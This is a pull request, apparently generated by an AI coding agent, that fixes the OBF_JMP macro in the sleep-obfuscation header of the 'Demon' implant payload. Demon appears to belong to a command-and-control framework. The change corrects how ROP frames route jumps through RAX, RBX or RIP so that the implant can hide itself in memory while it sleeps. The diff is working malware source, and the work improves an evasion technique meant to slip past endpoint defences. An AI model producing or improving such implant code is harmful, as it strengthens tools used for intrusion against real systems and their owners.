### PR TITLE
Correct SleepObf jump bypass handling

### DIFF
--- a/payloads/Demon/include/core/SleepObf.h
+++ b/payloads/Demon/include/core/SleepObf.h
@@ -13,14 +13,16 @@
 #define SLEEPOBF_BYPASS_JMPRAX 0x1
 #define SLEEPOBF_BYPASS_JMPRBX 0x2
 
-#define OBF_JMP( i, p ) \
-    if ( JmpBypass == SLEEPOBF_BYPASS_JMPRAX ) {    \
-        Rop[ i ].Rax = U_PTR( p );                  \
-    } if ( JmpBypass == SLEEPOBF_BYPASS_JMPRBX ) {  \
-        Rop[ i ].Rbx = U_PTR( & p );                \
-    } else {                                        \
-        Rop[ i ].Rip = U_PTR( p );                  \
-    }
+#define OBF_JMP( i, p )                                           \
+    do {                                                          \
+        if ( JmpBypass == SLEEPOBF_BYPASS_JMPRAX ) {              \
+            Rop[ i ].Rax = U_PTR( p );                            \
+        } else if ( JmpBypass == SLEEPOBF_BYPASS_JMPRBX ) {       \
+            Rop[ i ].Rbx = U_PTR( p );                            \
+        } else {                                                  \
+            Rop[ i ].Rip = U_PTR( p );                            \
+        }                                                         \
+    } while (0)
 
 typedef struct
 {


### PR DESCRIPTION
## Summary
- fix `OBF_JMP` macro to properly route jumps through RAX/RBX/RIP
- avoid taking the address of jump target and wrap macro in do-while

## Testing
- `cd payloads/Demon && rm -rf Build && mkdir Build && cd Build && cmake .. && cmake --build . -- -j 4` *(fails: `x86_64-w64-mingw32-gcc: not found`)*

------
https://chatgpt.com/codex/tasks/task_e_68a58bc42e7c8322bb4567ba3fa74a6c